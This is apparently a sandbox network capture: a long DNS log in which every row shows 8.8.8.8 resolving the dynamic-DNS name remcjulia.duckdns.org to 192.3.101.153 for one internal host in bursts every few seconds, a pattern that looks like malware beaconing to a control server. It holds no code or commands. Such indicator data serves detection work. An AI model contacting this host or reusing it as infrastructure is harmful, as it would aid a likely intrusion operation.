Apr 24, 2024 10:26:29.184525013 CEST	8.8.8.8	192.168.2.22	0x274d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:29.359255075 CEST	8.8.8.8	192.168.2.22	0x274d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.548897028 CEST	8.8.8.8	192.168.2.22	0x4921	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.719038963 CEST	8.8.8.8	192.168.2.22	0x4921	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:30.890930891 CEST	8.8.8.8	192.168.2.22	0x4921	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:31.062223911 CEST	8.8.8.8	192.168.2.22	0x4921	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:31.236418009 CEST	8.8.8.8	192.168.2.22	0x4921	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.434309006 CEST	8.8.8.8	192.168.2.22	0x7538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.608386040 CEST	8.8.8.8	192.168.2.22	0x7538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.782147884 CEST	8.8.8.8	192.168.2.22	0x7538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:32.954185963 CEST	8.8.8.8	192.168.2.22	0x7538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:33.125056982 CEST	8.8.8.8	192.168.2.22	0x7538	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.319205046 CEST	8.8.8.8	192.168.2.22	0x2979	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.494045019 CEST	8.8.8.8	192.168.2.22	0x2979	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.666218996 CEST	8.8.8.8	192.168.2.22	0x2979	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:34.836074114 CEST	8.8.8.8	192.168.2.22	0x2979	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:35.006588936 CEST	8.8.8.8	192.168.2.22	0x2979	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.191618919 CEST	8.8.8.8	192.168.2.22	0x92d7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.361696005 CEST	8.8.8.8	192.168.2.22	0x92d7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.555663109 CEST	8.8.8.8	192.168.2.22	0x92d7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.725583076 CEST	8.8.8.8	192.168.2.22	0x92d7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:36.896856070 CEST	8.8.8.8	192.168.2.22	0x92d7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.077953100 CEST	8.8.8.8	192.168.2.22	0xda8e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.253299952 CEST	8.8.8.8	192.168.2.22	0xda8e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.435071945 CEST	8.8.8.8	192.168.2.22	0xda8e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.679985046 CEST	8.8.8.8	192.168.2.22	0xda8e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:38.861875057 CEST	8.8.8.8	192.168.2.22	0xda8e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.052531004 CEST	8.8.8.8	192.168.2.22	0xb816	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.233623981 CEST	8.8.8.8	192.168.2.22	0xb816	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.404189110 CEST	8.8.8.8	192.168.2.22	0xb816	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.579121113 CEST	8.8.8.8	192.168.2.22	0xb816	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:40.750876904 CEST	8.8.8.8	192.168.2.22	0xb816	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:41.930162907 CEST	8.8.8.8	192.168.2.22	0x9f70	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.102247953 CEST	8.8.8.8	192.168.2.22	0x9f70	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.274316072 CEST	8.8.8.8	192.168.2.22	0x9f70	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.444140911 CEST	8.8.8.8	192.168.2.22	0x9f70	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:42.613888025 CEST	8.8.8.8	192.168.2.22	0x9f70	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:43.803381920 CEST	8.8.8.8	192.168.2.22	0xddb	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:43.974030018 CEST	8.8.8.8	192.168.2.22	0xddb	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:44.144519091 CEST	8.8.8.8	192.168.2.22	0xddb	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:44.314449072 CEST	8.8.8.8	192.168.2.22	0xddb	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:44.484065056 CEST	8.8.8.8	192.168.2.22	0xddb	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:45.680934906 CEST	8.8.8.8	192.168.2.22	0x472	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:45.851068974 CEST	8.8.8.8	192.168.2.22	0x472	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:46.021663904 CEST	8.8.8.8	192.168.2.22	0x472	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:46.193643093 CEST	8.8.8.8	192.168.2.22	0x472	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:46.366025925 CEST	8.8.8.8	192.168.2.22	0x472	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.545990944 CEST	8.8.8.8	192.168.2.22	0x8e3d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.717617989 CEST	8.8.8.8	192.168.2.22	0x8e3d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:47.887841940 CEST	8.8.8.8	192.168.2.22	0x8e3d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:48.060672045 CEST	8.8.8.8	192.168.2.22	0x8e3d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:48.232204914 CEST	8.8.8.8	192.168.2.22	0x8e3d	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.464854956 CEST	8.8.8.8	192.168.2.22	0x1361	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.641421080 CEST	8.8.8.8	192.168.2.22	0x1361	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.815567970 CEST	8.8.8.8	192.168.2.22	0x1361	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:49.989448071 CEST	8.8.8.8	192.168.2.22	0x1361	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:50.159270048 CEST	8.8.8.8	192.168.2.22	0x1361	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.356147051 CEST	8.8.8.8	192.168.2.22	0xfcb2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.528085947 CEST	8.8.8.8	192.168.2.22	0xfcb2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.704950094 CEST	8.8.8.8	192.168.2.22	0xfcb2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:51.875212908 CEST	8.8.8.8	192.168.2.22	0xfcb2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:52.048131943 CEST	8.8.8.8	192.168.2.22	0xfcb2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.241024971 CEST	8.8.8.8	192.168.2.22	0xde6c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.415363073 CEST	8.8.8.8	192.168.2.22	0xde6c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.585895061 CEST	8.8.8.8	192.168.2.22	0xde6c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.755740881 CEST	8.8.8.8	192.168.2.22	0xde6c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:53.925987005 CEST	8.8.8.8	192.168.2.22	0xde6c	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.113584995 CEST	8.8.8.8	192.168.2.22	0x9f80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.291619062 CEST	8.8.8.8	192.168.2.22	0x9f80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.462474108 CEST	8.8.8.8	192.168.2.22	0x9f80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.632875919 CEST	8.8.8.8	192.168.2.22	0x9f80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:55.805849075 CEST	8.8.8.8	192.168.2.22	0x9f80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:56.984988928 CEST	8.8.8.8	192.168.2.22	0xe076	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:57.154695034 CEST	8.8.8.8	192.168.2.22	0xe076	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:57.331542015 CEST	8.8.8.8	192.168.2.22	0xe076	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:57.501537085 CEST	8.8.8.8	192.168.2.22	0xe076	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:58.059910059 CEST	8.8.8.8	192.168.2.22	0xe076	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.247308969 CEST	8.8.8.8	192.168.2.22	0x43f2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.423841953 CEST	8.8.8.8	192.168.2.22	0x43f2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.674071074 CEST	8.8.8.8	192.168.2.22	0x43f2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:26:59.844248056 CEST	8.8.8.8	192.168.2.22	0x43f2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:00.015650988 CEST	8.8.8.8	192.168.2.22	0x43f2	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.224641085 CEST	8.8.8.8	192.168.2.22	0xfc7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.397818089 CEST	8.8.8.8	192.168.2.22	0xfc7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.572758913 CEST	8.8.8.8	192.168.2.22	0xfc7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.743514061 CEST	8.8.8.8	192.168.2.22	0xfc7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:01.920176029 CEST	8.8.8.8	192.168.2.22	0xfc7	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.586216927 CEST	8.8.8.8	192.168.2.22	0x8915	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.757922888 CEST	8.8.8.8	192.168.2.22	0x8915	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:03.935844898 CEST	8.8.8.8	192.168.2.22	0x8915	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:04.113516092 CEST	8.8.8.8	192.168.2.22	0x8915	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:04.283433914 CEST	8.8.8.8	192.168.2.22	0x8915	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.468291998 CEST	8.8.8.8	192.168.2.22	0x9837	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.641464949 CEST	8.8.8.8	192.168.2.22	0x9837	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.812572956 CEST	8.8.8.8	192.168.2.22	0x9837	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:05.983328104 CEST	8.8.8.8	192.168.2.22	0x9837	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:06.154604912 CEST	8.8.8.8	192.168.2.22	0x9837	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.345011950 CEST	8.8.8.8	192.168.2.22	0x11e6	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.516772032 CEST	8.8.8.8	192.168.2.22	0x11e6	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:07.762378931 CEST	8.8.8.8	192.168.2.22	0x11e6	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:08.007380009 CEST	8.8.8.8	192.168.2.22	0x11e6	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:08.177258968 CEST	8.8.8.8	192.168.2.22	0x11e6	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.452922106 CEST	8.8.8.8	192.168.2.22	0xbe80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.626900911 CEST	8.8.8.8	192.168.2.22	0xbe80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.802139997 CEST	8.8.8.8	192.168.2.22	0xbe80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:09.976722956 CEST	8.8.8.8	192.168.2.22	0xbe80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:10.146508932 CEST	8.8.8.8	192.168.2.22	0xbe80	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.342448950 CEST	8.8.8.8	192.168.2.22	0x49f5	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.515613079 CEST	8.8.8.8	192.168.2.22	0x49f5	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.685458899 CEST	8.8.8.8	192.168.2.22	0x49f5	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:11.855062008 CEST	8.8.8.8	192.168.2.22	0x49f5	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:12.028465033 CEST	8.8.8.8	192.168.2.22	0x49f5	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.229383945 CEST	8.8.8.8	192.168.2.22	0x68cd	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.400145054 CEST	8.8.8.8	192.168.2.22	0x68cd	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.572073936 CEST	8.8.8.8	192.168.2.22	0x68cd	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.788269997 CEST	8.8.8.8	192.168.2.22	0x68cd	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:13.963264942 CEST	8.8.8.8	192.168.2.22	0x68cd	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.525122881 CEST	8.8.8.8	192.168.2.22	0x7a74	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.695588112 CEST	8.8.8.8	192.168.2.22	0x7a74	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:15.865015984 CEST	8.8.8.8	192.168.2.22	0x7a74	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:16.037259102 CEST	8.8.8.8	192.168.2.22	0x7a74	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:16.207144022 CEST	8.8.8.8	192.168.2.22	0x7a74	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.400290012 CEST	8.8.8.8	192.168.2.22	0xbf3	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.573731899 CEST	8.8.8.8	192.168.2.22	0xbf3	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.746471882 CEST	8.8.8.8	192.168.2.22	0xbf3	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:17.918247938 CEST	8.8.8.8	192.168.2.22	0xbf3	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:18.088766098 CEST	8.8.8.8	192.168.2.22	0xbf3	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.284348011 CEST	8.8.8.8	192.168.2.22	0x7d03	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.455553055 CEST	8.8.8.8	192.168.2.22	0x7d03	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.627558947 CEST	8.8.8.8	192.168.2.22	0x7d03	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:19.799245119 CEST	8.8.8.8	192.168.2.22	0x7d03	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:20.047388077 CEST	8.8.8.8	192.168.2.22	0x7d03	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.234010935 CEST	8.8.8.8	192.168.2.22	0x8f6f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.410641909 CEST	8.8.8.8	192.168.2.22	0x8f6f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.586097956 CEST	8.8.8.8	192.168.2.22	0x8f6f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.764074087 CEST	8.8.8.8	192.168.2.22	0x8f6f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:21.938951969 CEST	8.8.8.8	192.168.2.22	0x8f6f	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.128317118 CEST	8.8.8.8	192.168.2.22	0x88bc	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.301006079 CEST	8.8.8.8	192.168.2.22	0x88bc	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.474225044 CEST	8.8.8.8	192.168.2.22	0x88bc	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.649605036 CEST	8.8.8.8	192.168.2.22	0x88bc	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:23.819699049 CEST	8.8.8.8	192.168.2.22	0x88bc	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.011573076 CEST	8.8.8.8	192.168.2.22	0x39d1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.184079885 CEST	8.8.8.8	192.168.2.22	0x39d1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.361017942 CEST	8.8.8.8	192.168.2.22	0x39d1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.533689022 CEST	8.8.8.8	192.168.2.22	0x39d1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:25.706526995 CEST	8.8.8.8	192.168.2.22	0x39d1	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:26.916534901 CEST	8.8.8.8	192.168.2.22	0x308e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.087018967 CEST	8.8.8.8	192.168.2.22	0x308e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.257760048 CEST	8.8.8.8	192.168.2.22	0x308e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.432301044 CEST	8.8.8.8	192.168.2.22	0x308e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:27.604813099 CEST	8.8.8.8	192.168.2.22	0x308e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:28.792529106 CEST	8.8.8.8	192.168.2.22	0x6d42	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:28.962521076 CEST	8.8.8.8	192.168.2.22	0x6d42	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:29.132242918 CEST	8.8.8.8	192.168.2.22	0x6d42	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:29.301928997 CEST	8.8.8.8	192.168.2.22	0x6d42	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:29.471369982 CEST	8.8.8.8	192.168.2.22	0x6d42	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:30.781611919 CEST	8.8.8.8	192.168.2.22	0xf54e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:30.956063986 CEST	8.8.8.8	192.168.2.22	0xf54e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:31.133898020 CEST	8.8.8.8	192.168.2.22	0xf54e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:31.304769039 CEST	8.8.8.8	192.168.2.22	0xf54e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:31.474975109 CEST	8.8.8.8	192.168.2.22	0xf54e	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:32.663552046 CEST	8.8.8.8	192.168.2.22	0x84b8	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:32.834345102 CEST	8.8.8.8	192.168.2.22	0x84b8	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
Apr 24, 2024 10:27:33.005570889 CEST	8.8.8.8	192.168.2.22	0x84b8	No error (0)	remcjulia.duckdns.org	192.3.101.153	A (IP address)	IN (0x0001)	false
